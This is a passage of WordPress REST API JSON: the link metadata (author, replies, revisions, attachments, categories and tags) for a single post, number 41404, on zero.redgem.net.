p\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41404"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41404\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41404"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}